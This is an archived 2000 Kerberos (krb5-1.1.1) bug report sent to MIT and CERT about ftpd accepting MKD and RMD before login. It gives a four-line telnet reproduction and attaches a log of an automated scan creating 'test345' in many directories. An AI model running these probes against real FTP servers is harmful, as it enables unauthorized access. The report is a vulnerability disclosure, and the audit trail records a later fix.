From Christopher@tfjc.com  Wed Jun 14 02:33:31 2000
Received: from fort-point-station.mit.edu (FORT-POINT-STATION.MIT.EDU [18.72.0.53])
	by rt-11.mit.edu (8.9.3/8.9.3) with ESMTP id CAA06383
	for <bugs@RT-11.MIT.EDU>; Wed, 14 Jun 2000 02:33:27 -0400 (EDT)
Received: from Sally.TfJC.Com (sally.tfjc.com [216.32.33.239] (may be forged))
	by fort-point-station.mit.edu (8.9.2/8.9.2) with ESMTP id CAA01618
	for <krb5-bugs@mit.edu>; Wed, 14 Jun 2000 02:33:24 -0400 (EDT)
Received: from Shelby.TfJC (Shelby.TfJC [192.168.50.3])
	by Sally.TfJC.Com (8.9.3/8.8.7) with ESMTP id XAA30111;
	Tue, 13 Jun 2000 23:33:15 -0700
Received: from Mail.TfJC.Com (localhost.localdomain [127.0.0.1])
	by Shelby.TfJC (8.9.3/8.8.7) with ESMTP id XAA01947;
	Tue, 13 Jun 2000 23:33:13 -0700
Message-Id: <39472721.EBFD36DD@Mail.TfJC.Com>
Date: Tue, 13 Jun 2000 23:33:05 -0700
From: "Christopher R. Thompson" <Christopher@tfjc.com>
Sender: Chris@tfjc.com
To: krb5-bugs@mit.edu, "cert@cert.org" <cert@cert.org>
Subject: Ftp Security Bug. krb5-1.1.1

>Number:         858
>Category:       krb5-appl
>Synopsis:       Ftp Security Bug. krb5-1.1.1
>Confidential:   no
>Severity:       serious
>Priority:       medium
>Responsible:    tlyu
>State:          closed
>Class:          sw-bug
>Submitter-Id:   unknown
>Arrival-Date:   Wed Jun 14 02:34:00 EDT 2000
>Last-Modified:  Mon Jul  9 16:46:55 EDT 2001
>Originator:     "Christopher R. Thompson" <Christopher@tfjc.com>
>Organization:
>Release:        krb5-1.1.1
>Environment:
>Description:
This is a multi-part message in MIME format.
--------------F7615CA233D622EED70B9E28
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit

Hackers have been busy the last month trying to get into my kerberized
ftp site and Saturday while I was away someone managed to actually
create a directory as root in my / "root" directory. This was achieved
with the MKD command and is reproducible with the following commands.

telnet host 21
mkd test1
mkd test2
rmd test1
quit


"host" now contains the directory named "/test1". Directory "/test2" was
created and then deleted. Following each mkd/rmd command the ftpd host
requests "530 please login with USER and PASS." and then either "257 MKD
command successful." or "250 RMD command successful."

I have not examined the ftpd code yet but I can only hope this is the
only hole. Making and deleting directory entries is rather benign but
some unscrupulous hacker could engineer a DOS attack on unsuspecting ftp
hosts.

Note the attached FTP LOG. These appear to be automated scripts and are
a regular daily and weekly occurrence for me here.
--------------F7615CA233D622EED70B9E28
Content-Type: text/plain; charset=us-ascii;
 name="test"
Content-Transfer-Encoding: 7bit
Content-Disposition: inline;
 filename="test"

Jun 10 05:08:59 sally ftpd[21432]: connect from 129.125.104.178 
Jun 10 05:08:59 sally ftpd[21432]: connection from 129.125.104.178 (flits104-178.flits.rug.nl) at Sat Jun 10 05:08:59 2000 
Jun 10 05:08:59 sally ftpd[21432]: <--- 220 
Jun 10 05:08:59 sally ftpd[21432]: Sally.TfJC.Com FTP server (Version 5.60) ready. 
Jun 10 05:08:59 sally ftpd[21432]: command: <MKD test345>(13) 
Jun 10 05:08:59 sally ftpd[21432]: <--- 530 
Jun 10 05:08:59 sally ftpd[21432]: Please login with USER and PASS. 
Jun 10 05:08:59 sally ftpd[21432]: <--- 257 
Jun 10 05:08:59 sally ftpd[21432]: MKD command successful. 
Jun 10 05:09:00 sally ftpd[21432]: command: <CWD />(7) 
Jun 10 05:09:00 sally ftpd[21432]: <--- 530 
Jun 10 05:09:00 sally ftpd[21432]: Please login with USER and PASS. 
Jun 10 05:09:00 sally ftpd[21432]: command: <CWD /incoming/>(16) 
Jun 10 05:09:00 sally ftpd[21432]: <--- 530 
Jun 10 05:09:00 sally ftpd[21432]: Please login with USER and PASS. 
Jun 10 05:09:00 sally ftpd[21432]: command: <MKD test345>(13) 
Jun 10 05:09:00 sally ftpd[21432]: <--- 530 
Jun 10 05:09:00 sally ftpd[21432]: Please login with USER and PASS. 
Jun 10 05:09:00 sally ftpd[21432]: <--- 550 
Jun 10 05:09:00 sally ftpd[21432]: test345: File exists. 
Jun 10 05:09:00 sally ftpd[21432]: command: <CWD />(7) 
Jun 10 05:09:00 sally ftpd[21432]: <--- 530 
Jun 10 05:09:00 sally ftpd[21432]: Please login with USER and PASS. 
Jun 10 05:09:00 sally ftpd[21432]: command: <CWD /upload/>(14) 
Jun 10 05:09:00 sally ftpd[21432]: <--- 530 
Jun 10 05:09:00 sally ftpd[21432]: Please login with USER and PASS. 
Jun 10 05:09:01 sally ftpd[21432]: command: <MKD test345>(13) 
Jun 10 05:09:01 sally ftpd[21432]: <--- 530 
Jun 10 05:09:01 sally ftpd[21432]: Please login with USER and PASS. 
Jun 10 05:09:01 sally ftpd[21432]: <--- 550 
Jun 10 05:09:01 sally ftpd[21432]: test345: File exists. 
Jun 10 05:09:01 sally ftpd[21432]: command: <CWD />(7) 
Jun 10 05:09:01 sally ftpd[21432]: <--- 530 
Jun 10 05:09:01 sally ftpd[21432]: Please login with USER and PASS. 
Jun 10 05:09:01 sally ftpd[21432]: command: <CWD /_vti_pvt/>(16) 
Jun 10 05:09:01 sally ftpd[21432]: <--- 530 
Jun 10 05:09:01 sally ftpd[21432]: Please login with USER and PASS. 
Jun 10 05:09:01 sally ftpd[21432]: command: <MKD test345>(13) 
Jun 10 05:09:01 sally ftpd[21432]: <--- 530 
Jun 10 05:09:01 sally ftpd[21432]: Please login with USER and PASS. 
Jun 10 05:09:01 sally ftpd[21432]: <--- 550 
Jun 10 05:09:01 sally ftpd[21432]: test345: File exists. 
Jun 10 05:09:01 sally ftpd[21432]: command: <CWD />(7) 
Jun 10 05:09:01 sally ftpd[21432]: <--- 530 
Jun 10 05:09:01 sally ftpd[21432]: Please login with USER and PASS. 
Jun 10 05:09:02 sally ftpd[21432]: command: <CWD /_vti_txt/>(16) 
Jun 10 05:09:02 sally ftpd[21432]: <--- 530 
Jun 10 05:09:02 sally ftpd[21432]: Please login with USER and PASS. 
Jun 10 05:09:02 sally ftpd[21432]: command: <MKD test345>(13) 
Jun 10 05:09:02 sally ftpd[21432]: <--- 530 
Jun 10 05:09:02 sally ftpd[21432]: Please login with USER and PASS. 
Jun 10 05:09:02 sally ftpd[21432]: <--- 550 
Jun 10 05:09:02 sally ftpd[21432]: test345: File exists. 
Jun 10 05:09:02 sally ftpd[21432]: command: <CWD />(7) 
Jun 10 05:09:02 sally ftpd[21432]: <--- 530 
Jun 10 05:09:02 sally ftpd[21432]: Please login with USER and PASS. 
Jun 10 05:09:02 sally ftpd[21432]: command: <CWD /_vti_log/>(16) 
Jun 10 05:09:02 sally ftpd[21432]: <--- 530 
Jun 10 05:09:02 sally ftpd[21432]: Please login with USER and PASS. 
Jun 10 05:09:03 sally ftpd[21432]: command: <MKD test345>(13) 
Jun 10 05:09:03 sally ftpd[21432]: <--- 530 
Jun 10 05:09:03 sally ftpd[21432]: Please login with USER and PASS. 
Jun 10 05:09:03 sally ftpd[21432]: <--- 550 
Jun 10 05:09:03 sally ftpd[21432]: test345: File exists. 
Jun 10 05:09:03 sally ftpd[21432]: command: <CWD />(7) 
Jun 10 05:09:03 sally ftpd[21432]: <--- 530 
Jun 10 05:09:03 sally ftpd[21432]: Please login with USER and PASS. 
Jun 10 05:09:03 sally ftpd[21432]: command: <CWD /wwwroot/>(15) 
Jun 10 05:09:03 sally ftpd[21432]: <--- 530 
Jun 10 05:09:03 sally ftpd[21432]: Please login with USER and PASS. 
Jun 10 05:09:03 sally ftpd[21432]: command: <MKD test345>(13) 
Jun 10 05:09:03 sally ftpd[21432]: <--- 530 
Jun 10 05:09:03 sally ftpd[21432]: Please login with USER and PASS. 
Jun 10 05:09:03 sally ftpd[21432]: <--- 550 
Jun 10 05:09:03 sally ftpd[21432]: test345: File exists. 
Jun 10 05:09:03 sally ftpd[21432]: command: <CWD />(7) 
Jun 10 05:09:03 sally ftpd[21432]: <--- 530 
Jun 10 05:09:03 sally ftpd[21432]: Please login with USER and PASS. 
Jun 10 05:09:04 sally ftpd[21432]: command: <CWD /anonymous/>(17) 
Jun 10 05:09:04 sally ftpd[21432]: <--- 530 
Jun 10 05:09:04 sally ftpd[21432]: Please login with USER and PASS. 
Jun 10 05:09:04 sally ftpd[21432]: command: <MKD test345>(13) 
Jun 10 05:09:04 sally ftpd[21432]: <--- 530 
Jun 10 05:09:04 sally ftpd[21432]: Please login with USER and PASS. 
Jun 10 05:09:04 sally ftpd[21432]: <--- 550 
Jun 10 05:09:04 sally ftpd[21432]: test345: File exists. 
Jun 10 05:09:04 sally ftpd[21432]: command: <CWD />(7) 
Jun 10 05:09:04 sally ftpd[21432]: <--- 530 
Jun 10 05:09:04 sally ftpd[21432]: Please login with USER and PASS. 
Jun 10 05:09:04 sally ftpd[21432]: command: <CWD /public/>(14) 
Jun 10 05:09:04 sally ftpd[21432]: <--- 530 
Jun 10 05:09:04 sally ftpd[21432]: Please login with USER and PASS. 
Jun 10 05:09:05 sally ftpd[21432]: command: <MKD test345>(13) 
Jun 10 05:09:05 sally ftpd[21432]: <--- 530 
Jun 10 05:09:05 sally ftpd[21432]: Please login with USER and PASS. 
Jun 10 05:09:05 sally ftpd[21432]: <--- 550 
Jun 10 05:09:05 sally ftpd[21432]: test345: File exists. 
Jun 10 05:09:05 sally ftpd[21432]: command: <CWD />(7) 
Jun 10 05:09:05 sally ftpd[21432]: <--- 530 
Jun 10 05:09:05 sally ftpd[21432]: Please login with USER and PASS. 
Jun 10 05:09:05 sally ftpd[21432]: command: <CWD /outgoing/>(16) 
Jun 10 05:09:05 sally ftpd[21432]: <--- 530 
Jun 10 05:09:05 sally ftpd[21432]: Please login with USER and PASS. 
Jun 10 05:09:05 sally ftpd[21432]: command: <MKD test345>(13) 
Jun 10 05:09:05 sally ftpd[21432]: <--- 530 
Jun 10 05:09:05 sally ftpd[21432]: Please login with USER and PASS. 
Jun 10 05:09:05 sally ftpd[21432]: <--- 550 
Jun 10 05:09:05 sally ftpd[21432]: test345: File exists. 
Jun 10 05:09:05 sally ftpd[21432]: command: <CWD />(7) 
Jun 10 05:09:05 sally ftpd[21432]: <--- 530 
Jun 10 05:09:05 sally ftpd[21432]: Please login with USER and PASS. 
Jun 10 05:09:06 sally ftpd[21432]: command: <CWD /cgi-bin/>(15) 
Jun 10 05:09:06 sally ftpd[21432]: <--- 530 
Jun 10 05:09:06 sally ftpd[21432]: Please login with USER and PASS. 
Jun 10 05:09:06 sally ftpd[21432]: command: <MKD test345>(13) 
Jun 10 05:09:06 sally ftpd[21432]: <--- 530 
Jun 10 05:09:06 sally ftpd[21432]: Please login with USER and PASS. 
Jun 10 05:09:06 sally ftpd[21432]: <--- 550 
Jun 10 05:09:06 sally ftpd[21432]: test345: File exists. 
Jun 10 05:09:06 sally ftpd[21432]: command: <CWD />(7) 
Jun 10 05:09:06 sally ftpd[21432]: <--- 530 
Jun 10 05:09:06 sally ftpd[21432]: Please login with USER and PASS. 
Jun 10 05:09:06 sally ftpd[21432]: command: <CWD /tmp/>(11) 
Jun 10 05:09:06 sally ftpd[21432]: <--- 530 
Jun 10 05:09:06 sally ftpd[21432]: Please login with USER and PASS. 
Jun 10 05:09:07 sally ftpd[21432]: command: <MKD test345>(13) 
Jun 10 05:09:07 sally ftpd[21432]: <--- 530 
Jun 10 05:09:07 sally ftpd[21432]: Please login with USER and PASS. 
Jun 10 05:09:07 sally ftpd[21432]: <--- 550 
Jun 10 05:09:07 sally ftpd[21432]: test345: File exists. 
Jun 10 05:09:07 sally ftpd[21432]: command: <CWD />(7) 
Jun 10 05:09:07 sally ftpd[21432]: <--- 530 
Jun 10 05:09:07 sally ftpd[21432]: Please login with USER and PASS. 
Jun 10 05:09:07 sally ftpd[21432]: command: <CWD /anonymous/_vti_pvt/>(26) 
Jun 10 05:09:07 sally ftpd[21432]: <--- 530 
Jun 10 05:09:07 sally ftpd[21432]: Please login with USER and PASS. 
Jun 10 05:09:07 sally ftpd[21432]: command: <MKD test345>(13) 
Jun 10 05:09:07 sally ftpd[21432]: <--- 530 
Jun 10 05:09:07 sally ftpd[21432]: Please login with USER and PASS. 
Jun 10 05:09:07 sally ftpd[21432]: <--- 550 
Jun 10 05:09:07 sally ftpd[21432]: test345: File exists. 
Jun 10 05:09:07 sally ftpd[21432]: command: <CWD />(7) 
Jun 10 05:09:07 sally ftpd[21432]: <--- 530 
Jun 10 05:09:07 sally ftpd[21432]: Please login with USER and PASS. 
Jun 10 05:09:08 sally ftpd[21432]: command: <CWD /anonymous/incoming/>(26) 
Jun 10 05:09:08 sally ftpd[21432]: <--- 530 
Jun 10 05:09:08 sally ftpd[21432]: Please login with USER and PASS. 
Jun 10 05:09:08 sally ftpd[21432]: command: <MKD test345>(13) 
Jun 10 05:09:08 sally ftpd[21432]: <--- 530 
Jun 10 05:09:08 sally ftpd[21432]: Please login with USER and PASS. 
Jun 10 05:09:08 sally ftpd[21432]: <--- 550 
Jun 10 05:09:08 sally ftpd[21432]: test345: File exists. 
Jun 10 05:09:08 sally ftpd[21432]: command: <CWD />(7) 
Jun 10 05:09:08 sally ftpd[21432]: <--- 530 
Jun 10 05:09:08 sally ftpd[21432]: Please login with USER and PASS. 
Jun 10 05:09:08 sally ftpd[21432]: command: <CWD /mailroot/>(16) 
Jun 10 05:09:08 sally ftpd[21432]: <--- 530 
Jun 10 05:09:08 sally ftpd[21432]: Please login with USER and PASS. 
Jun 10 05:09:09 sally ftpd[21432]: command: <MKD test345>(13) 
Jun 10 05:09:09 sally ftpd[21432]: <--- 530 
Jun 10 05:09:09 sally ftpd[21432]: Please login with USER and PASS. 
Jun 10 05:09:09 sally ftpd[21432]: <--- 550 
Jun 10 05:09:09 sally ftpd[21432]: test345: File exists. 
Jun 10 05:09:09 sally ftpd[21432]: command: <CWD />(7) 
Jun 10 05:09:09 sally ftpd[21432]: <--- 530 
Jun 10 05:09:09 sally ftpd[21432]: Please login with USER and PASS. 
Jun 10 05:09:09 sally ftpd[21432]: command: <CWD /ftproot/>(15) 
Jun 10 05:09:09 sally ftpd[21432]: <--- 530 
Jun 10 05:09:09 sally ftpd[21432]: Please login with USER and PASS. 
Jun 10 05:09:09 sally ftpd[21432]: command: <MKD test345>(13) 
Jun 10 05:09:09 sally ftpd[21432]: <--- 530 
Jun 10 05:09:09 sally ftpd[21432]: Please login with USER and PASS. 
Jun 10 05:09:09 sally ftpd[21432]: <--- 550 
Jun 10 05:09:09 sally ftpd[21432]: test345: File exists. 
Jun 10 05:09:09 sally ftpd[21432]: command: <CWD />(7) 
Jun 10 05:09:09 sally ftpd[21432]: <--- 530 
Jun 10 05:09:09 sally ftpd[21432]: Please login with USER and PASS. 
Jun 10 05:09:10 sally ftpd[21432]: command: <CWD /anonymous/pub/>(21) 
Jun 10 05:09:10 sally ftpd[21432]: <--- 530 
Jun 10 05:09:10 sally ftpd[21432]: Please login with USER and PASS. 
Jun 10 05:09:10 sally ftpd[21432]: command: <MKD test345>(13) 
Jun 10 05:09:10 sally ftpd[21432]: <--- 530 
Jun 10 05:09:10 sally ftpd[21432]: Please login with USER and PASS. 
Jun 10 05:09:10 sally ftpd[21432]: <--- 550 
Jun 10 05:09:10 sally ftpd[21432]: test345: File exists. 
Jun 10 05:09:10 sally ftpd[21432]: atmark: c=-1 
Jun 10 05:09:10 sally ftpd[21432]: lost connection 

--------------F7615CA233D622EED70B9E28--

>How-To-Repeat:
>Fix:
>Audit-Trail:

Responsible-Changed-From-To: gnats-admin->krb5-unassigned
Responsible-Changed-By: raeburn
Responsible-Changed-When: Sat Jun 23 01:37:25 2001
Responsible-Changed-Why:

Responsible-Changed-From-To: krb5-unassigned->tlyu
Responsible-Changed-By: raeburn
Responsible-Changed-When: Mon Jul  9 16:42:02 2001
Responsible-Changed-Why:

I *think* this is one of the ones you plugged a while back.  Please
confirm it and close this PR if appropriate...

State-Changed-From-To: open-closed
State-Changed-By: tlyu
State-Changed-When: Mon Jul  9 16:46:28 2001
State-Changed-Why:

This has been fixed a while ago.  The 1.2.2 release should have a fix
for it, among many other things.

>Unformatted: